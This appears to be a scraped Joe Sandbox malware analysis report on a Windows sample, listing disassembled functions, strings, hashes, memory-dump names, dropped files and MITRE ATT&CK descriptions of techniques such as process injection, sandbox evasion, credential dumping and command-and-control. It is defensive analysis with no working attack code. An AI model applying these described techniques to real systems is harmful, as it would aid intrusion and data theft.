___swprintf_l.LIBCMT ref: 0509A52E

Strings

ffff:, xrefs: 0509A504
::ffff:0:%u.%u.%u.%u, xrefs: 0509A54E
::%hs%u.%u.%u.%u, xrefs: 0509A527
:%u.%u.%u.%u, xrefs: 0509A5B8

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c3d683e21ae4f733ab67cf5749bcead4888185ec7ba88c9646a9999cd142ea89
Instruction ID: 82d3853609ed7d7cc8580114a1f2934b7e7cb0f49bc92baf65c93121ae8b4764
Opcode Fuzzy Hash: c3d683e21ae4f733ab67cf5749bcead4888185ec7ba88c9646a9999cd142ea89
Instruction Fuzzy Hash: EF51F6B6B04117BFCF24DB98AC9097EFBF9BB58200B50C229E465D7645E234DE508BE0

Function 05057630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05094742
CLIENT(ntdll): Processing section info %ws..., xrefs: 05094787
Execute=1, xrefs: 05094713
ExecuteOptions, xrefs: 050946A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05094655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05094725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050946FC

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a257ec0bbfa8013ec4a52e3acfff3befb5383770caa340f6400d5e8dfb886489
Instruction ID: f02da804c4344a598c3d0d90084611a4e330224e695c6f90d81e466b37e981cf
Opcode Fuzzy Hash: a257ec0bbfa8013ec4a52e3acfff3befb5383770caa340f6400d5e8dfb886489
Instruction Fuzzy Hash: 4A510535700219AAEF11EAA4FD89FFE77E9FB14360F040099E905AB180EB719E45EF51

Function 0506B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0506B6BF

Strings

0, xrefs: 0506B66F
-, xrefs: 0506B650
+, xrefs: 0506B65A
0, xrefs: 0506B695

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: a55487bf653a2556fac87bfc720da2c7c61a523fbdfd25511d1d48ecea105317
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 8581D3B0E492499EDF24CF68E991BFEBBF2BF45310F18411AE892E7291C7349941CB51

Function 0504F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050902BD
RTL: Re-Waiting, xrefs: 0509031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050902E7

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 54a548094520e7fb15038e86c9ff40d9a42b9304f450d5b53a30e254c63ed09b
Instruction ID: e1b88711d14f0364552ad15a35083eb74b6add3b6ce01d5ae4de9bd79d04c553
Opcode Fuzzy Hash: 54a548094520e7fb15038e86c9ff40d9a42b9304f450d5b53a30e254c63ed09b
Instruction Fuzzy Hash: 89E1AD706087429FDB64CF28E998B6EB7E1BB84314F144A6DE5A68B3D0D774E844CB42

Function 0505BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 05097B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05097B7F
RTL: Re-Waiting, xrefs: 05097BAC

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: ce558792bf246a1f662c79f9105cae6dc4a0fa2221a54e3a72fdb1e628896f01
Instruction ID: a2a0db989018d03081ce24f1d4d0bb2f221cfc9855385e2310f0581a2bdf0dc5
Opcode Fuzzy Hash: ce558792bf246a1f662c79f9105cae6dc4a0fa2221a54e3a72fdb1e628896f01
Instruction Fuzzy Hash: 4941C0367047029BDB24DE25E841B6FB7E6FF89720F100A2DF95A9B280DB71F4058B91

Function 0505B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0509728C

Strings

RTL: Resource at %p, xrefs: 050972A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05097294
RTL: Re-Waiting, xrefs: 050972C1

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 1ae259cd03caca70de42ad0a50755516e393fb952ab63d295521c9fd6b744276
Instruction ID: 18d794c780407ccb4ba3ab039dd3adf27236947f727b443acdfb0da5587cde4f
Opcode Fuzzy Hash: 1ae259cd03caca70de42ad0a50755516e393fb952ab63d295521c9fd6b744276
Instruction Fuzzy Hash: 1F41F032714606ABCB25DE64EC41FAEB7E6FF95720F100618FC56AB240DB21F8029BD1

Function 05067D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05067E8B

Strings

+, xrefs: 05067DE8
-, xrefs: 05067DDD

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: bf627563014debddb8ac2779031dded8d3fceaf984f2ac09bc336588565a4c27
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: AF91A270E0421A9BEB64DF69E881ABEB7F6FF44728F14851AE855E72C0D734C9418750

Function 05029126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 05029191
@, xrefs: 05029175

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 01155607209dc88ce9a671ccfe84eac0f719b78a1f218d4bfc24643fa6b4a1e8
Instruction ID: 309f03b7f448ae4af22b1e3dc56dcadfc6d9a285f2f2941c8d28fd1b2db0ed03
Opcode Fuzzy Hash: 01155607209dc88ce9a671ccfe84eac0f719b78a1f218d4bfc24643fa6b4a1e8
Instruction Fuzzy Hash: 3B813B75D002799BDB21DF54DC49BEEB7B8AF08750F0445EAA91AB7280D7309E84CFA4

Analysis Process: uwZgUlCQSPVT.exePID: 5228, Parent PID: 8000COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 02B7A2D2 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(?), ref: 02B7A307

Memory Dump Source

Source File: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2b50000_uwZgUlCQSPVT.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: abaa9aa461bf128610e0ef014c82e0a5a10816046abb2e83f646fa1486bc8bb9
Instruction ID: c08857d02825a57311fa8a06725f69d07556d945355739928538ab4478d7d2af
Opcode Fuzzy Hash: abaa9aa461bf128610e0ef014c82e0a5a10816046abb2e83f646fa1486bc8bb9
Instruction Fuzzy Hash: ACE046762012187BC210EB59DC00EDBB3ADEBC6350B408455FE49AB200EA30B9118BF4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report H25iQbxCki.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_H25iQbxCki.exe_f2ee5e307e47d36665237e6f9f8c1a2a4a558fb_6bdd3c55_682a866f-9f68-41ec-b671-4e9ee78eec3e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2640.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A09.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A58.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\2E85-1J297

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3s0tjzuw.p51.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eysd10bw.ajf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g35jm0fp.ux4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htilnplb.3ax.psm1

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

Windows Analysis Report
H25iQbxCki.exe

Function 00007FFD9B88211D Relevance: 1.7, Strings: 1, Instructions: 494
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre